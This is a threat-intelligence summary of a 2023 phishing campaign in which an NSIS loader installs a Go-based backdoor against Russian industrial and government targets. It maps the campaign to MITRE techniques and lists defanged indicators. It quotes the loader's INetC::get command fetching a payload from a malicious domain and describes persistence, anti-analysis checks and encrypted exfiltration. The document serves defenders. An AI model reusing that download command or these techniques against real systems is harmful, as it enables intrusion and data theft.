Threat Research

Атаки на индустриальный и государственный секторы РФ

Securonix

A Russian-targeted phishing campaign delivered a NSIS-based loader that installs backdoors and data-stealing components, with Go-written UsrRunVGA.exe as the main backdoor. The operation operated in two waves, using anti-virtualization checks, encrypted data exfiltration, and multiple C2 domains to collect and transmit stolen data.

Keypoints

  • The initial artifact Finansovyy_kontrol_2023_180529.rar was distributed as an email attachment in early June 2023, forming the drop for the campaign.
  • The NSIS script decrypts strings, opens a legitimate-looking Finansovyy_kontrol_2023_180529.pdf to distract the user, and attempts to download a malicious payload from a remote resource.
  • The dropper installs UsrRunVGA.exe to C:ProgramDataMicrosoftDeviceSync and adds it to startup via a startup shortcut (menu.lnk), ensuring persistence.
  • UsrRunVGA.exe is a Go-based backdoor with obfuscated strings, anti-VM/anti-sandbox checks, and modules for data theft and remote control.
  • Exfiltrated data is AES-256-GCM encrypted and sent to the C2 server with a fixed embedded key; the RSA-encrypted commands list indicates evolving encryption/crypto usage.
  • A second campaign (mid-August 2023) connected to lunnayareka[.]com and added stronger anti-analysis checks and browser data theft capabilities, including password-stealing from numerous browsers.

MITRE Techniques

  • [T1566.001] Phishing – Spearphishing Attachment – The first artifact of the attack was the malicious file finansovyy_kontrol_2023_180529.rar, which was distributed as an email attachment. [‘Phishing: Spearphishing Attachment’]
  • [T1059.003] Execution – Command and Scripting Interpreter: Windows Command Shell – The NSIS loader calls commands like INetC::get to fetch payloads, e.g., INetC::get /SILENT /USERAGENT “Mozilla/5.0” “hxxps://fas-gov-ru[.]com/?e&n=zr6tjbinjvef86”. [‘Windows Command Shell’]
  • [T1204.002] Execution – User Execution: Malicious File – The attacker opens a legitimate-looking document (finansovyy_kontrol_2023_180529.pdf) to distract the user. [‘Malicious File’]
  • [T1547.001] Persistence – Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – The loader copies the payload to C:ProgramDataMicrosoftDeviceSyncUsrRunVGA.exe and creates startup/autostart mechanisms (StartUp menu.lnk). [‘Startup Folder’]
  • [T1202] Defense Evasion – Indirect Command Execution – The NSIS script triggers indirect execution paths to download and run components. [‘Indirect Command Execution’]
  • [T1070.004] Defense Evasion – Indicator Removal: File Deletion – The analysis notes mechanisms to minimize traces; described as flag checks to prevent re-running. [‘File Deletion’]
  • [T1027] Defense Evasion – Obfuscated Files or Information – Strings and code are XOR-encrypted/obfuscated in the NSIS script and the backdoor binary. [‘Obfuscated Files or Information’]
  • [T1087.001] Discovery – Account Discovery: Local Account – The backdoor enumerates local account/configuration to tailor actions. [‘Account Discovery: Local Account’]
  • [T1083] Discovery – File and Directory Discovery – The malware searches for files and directories for exfiltration targets. [‘File and Directory Discovery’]
  • [T1518.001] Discovery – Software Discovery: Security Software Discovery – Checks against security software and virtualization indicators. [‘Security Software Discovery’]
  • [T1082] Discovery – System Information Discovery – The backdoor gathers system information (via ghw) to decide on execution. [‘System Information Discovery’]
  • [T1033] Discovery – System Owner/User Discovery – The malware collects user/system identifiers to enforce checks. [‘System Owner/User Discovery’]
  • [T1560.002] Collection – Archive Collected Data: Archive via Library – Data collected is archived for exfiltration. [‘Archive via Library’]
  • [T1005] Collection – Data from Local System – Data theft directly from the compromised host. [‘Data from Local System’]
  • [T1071.001] Command and Control – Application Layer Protocol: Web Protocols – Exfiltration and C2 communications use HTTPS/Web protocols. [‘Web Protocols’]
  • [T1132.001] Command and Control – Data Encoding: Standard Encoding – Data is encoded for exfiltration. [‘Standard Encoding’]
  • [T1573.001] Command and Control – Encrypted Channel: Symmetric Cryptography – AES encryption of exfil data and embedded keys. [‘Symmetric Cryptography’]

Indicators of Compromise

  • [Domain] – fas-gov-ru[.]com, tantsuyushchiykarlik[.]com, lunnayareka[.]com, and other malicious domains referenced in the campaign
  • [File name] – finansovyy_kontrol_2023_180529.rar, finansovyy_kontrol_2023_180529.com, detali_dogovora_no_2023_000849.com
  • [Executable] – UsrRunVGA.exe (Go-based backdoor); Dmcserv.exe; Netrunner.exe (brought up in first phishing wave)
  • [Startup/Startup Shortcut] – %USERPROFILE%AppDataRoamingMicrosoftWindowsStart MenuPrograms StartUpmenu.lnk
  • [URL] – hxxps://fas-gov-ru[.]com/?e&n=zr6tjbinjvef86, hxxps://tantsuyushchiykarlik[.]com/?h= (C2 URL)
  • [User-Agent] – Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.5
  • [Disk model/Device info] – values derived from ghw library (e.g., disk_model sent to C2)

Read more: https://securelist.ru/ataki-na-industrialnyj-i-gosudarstvennyj-sektory-rf/108229/